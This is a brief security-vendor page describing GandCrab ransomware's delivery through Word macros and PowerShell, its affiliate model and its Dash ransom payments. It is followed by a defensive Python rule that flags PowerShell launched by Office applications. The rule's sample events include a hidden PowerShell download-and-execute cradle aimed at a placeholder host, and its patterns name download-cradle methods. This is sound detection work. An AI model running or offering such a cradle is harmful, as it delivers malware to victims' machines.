GandCrab ransomware

GandCrab ransomware encrypts victims’ files and demands a ransom payment in exchange for access to the data. It follows an affiliate marketing business model, in which low-level cybercriminals find new victims while the threat authors improve their creation. It arrives as malicious spam email with a Microsoft Word attachment; a macro in the document executes a PowerShell command that downloads the ransomware onto the victim's system.

Ransom notes are placed prominently on the victim’s computer, directing them to a website on the Dark Web where they can decrypt one file of their choosing for free. Ransom payments are made through a cryptocurrency called Dash, and the ransom demands set by the affiliate can range between $600 and $600,000.

A SIEM solution that uses the MITRE ATT&CK matrix can detect malicious abuse of PowerShell in your network, preventing the malware download and ensuring protection.
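The kind of rule such a SIEM applies to the delivery chain described above (Word macro launching PowerShell to download a payload) can be sketched as follows. This is an added example, not code from the original page or from any product; it assumes process-creation events with the Sysmon-style fields `Image`, `ParentImage` and `CommandLine`, and the sample events and rule names are constructed.

```python
import re
from pathlib import PureWindowsPath

# Office applications whose macros can launch child processes.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Heuristics for the command line; they raise priority, they are not proof.
HIDDEN = re.compile(r"\s-w[a-z]*\s+hidden\b", re.I)
DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer", re.I)

def _abbreviates(token, full_switch):
    # PowerShell accepts any unambiguous prefix of a switch (-e, -enc, ...).
    t = token.lower()
    return len(t) >= 2 and full_switch.startswith(t)

def score(event):
    """Return the reasons an event matches ATT&CK T1059.001 abuse, or []."""
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    child = PureWindowsPath(event["Image"]).name.lower()
    if parent not in OFFICE_PARENTS or child not in POWERSHELL:
        return []
    reasons = ["office-spawned-powershell"]
    cmd = event.get("CommandLine", "")
    if any(_abbreviates(t, "-encodedcommand") for t in cmd.split()):
        reasons.append("encoded-command")
    if HIDDEN.search(cmd):
        reasons.append("hidden-window")
    if DOWNLOAD.search(cmd):
        reasons.append("download-cradle")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that matches."""
    return [(i, r) for i, e in enumerate(events) if (r := score(e))]

# Constructed sample events (not taken from a real incident).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": WORD, "Image": PS, "CommandLine":
     "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": WORD, "Image": PS, "CommandLine": "powershell.exe -NoP -enc QQBCAEMA"},
    {"ParentImage": WORD, "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(idx, ", ".join(why))
```

The parent-child match alone is the high-signal condition; the command-line reasons only help an analyst triage which alerts to open first.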

In this video, we talk about what GandCrab is, how it spreads, and ways to mitigate this ransomware. Watch the video to learn more; three minutes is all it takes!




© 2021 Zoho Corporation Pvt. Ltd. All rights reserved.